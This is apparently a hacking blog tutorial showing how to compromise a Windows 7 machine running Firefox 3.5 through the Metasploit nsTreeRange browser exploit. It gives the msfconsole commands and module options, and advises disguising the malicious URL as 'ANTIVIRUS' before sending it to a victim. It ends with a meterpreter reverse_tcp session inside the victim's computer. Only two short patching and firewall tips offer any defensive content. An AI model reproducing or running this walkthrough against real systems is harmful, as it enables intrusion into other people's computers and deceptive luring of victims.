Today while surfing I read some news about nsTreeRange Mozilla Firefox version 3.5 to 188.8.131.52 Vulnerability. Actually this vulnerbility ranking is not excellent or good, but it’s normal vulnerability. This vulnerability was known at 2011-07-10 by sinn3r. In this tutorial I’m using Windows 7 for my victim Operating system with Mozilla Firefox v 3.5.17. If you also want to try out this tutorial, you can find Mozilla Firefox version which I describe above at oldapps.com.
2. Linux OS or Backtrack 5(Metasploit already included inside this distro)
1. The first step, just go to your msfconsole, and then use exploit/windows/browser/mozilla_nstreerange. If it returns cannot find exploit, maybe you should update your msf framework first by running msfupdate.
msf > use exploit/windows/browser/mozilla_nstreerange msf exploit(mozilla_nstreerange) > show options Module options (exploit/windows/browser/mozilla_nstreerange): Name Current Setting Required Description ---- --------------- -------- ----------- CreateThread true yes Whether to execute the payload in a new thread SEHProlog true yes Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Auto (Direct attack against Windows XP, otherwise through Java, if enabled)
2. There’s a few option you should set up first before launching this exploit.
SRVHOST : Your IP address acts as exploit server
SRVPORT : port use to serve request from victim. The default value is 8080 but if your port 80 was free, it’s better to use port 80.
URIPATH : It’s something looks like http://www.hacking-tutorial.com/URIPATH, you can change this value to make URIPATH more readable by human e.g : http://www.hacking-tutorial.com/ANTIVIRUS, etc.
In above picture I’m also using meterpreter reverse_tcp payload. but you can choose the most suitable payload for you 🙂
3. Everything was set up correctly, then run exploit to run our malicious webserver.
4. After the victim opened our malicious URL we’ve already send to them, our server processing and create new notepad.exe process at victim computer. Below is the screenshot.
5. A new session ID 1 has created, the next step we can interract with that session ID to gain privilege on victim computer.
sessions -l 1
That’s it we’re already inside victim computer. 🙂
– Always update your Mozilla Firefox into lastest version.
– Use personal firewall to detect inbound and outbound traffic.
Hope you found it useful 🙂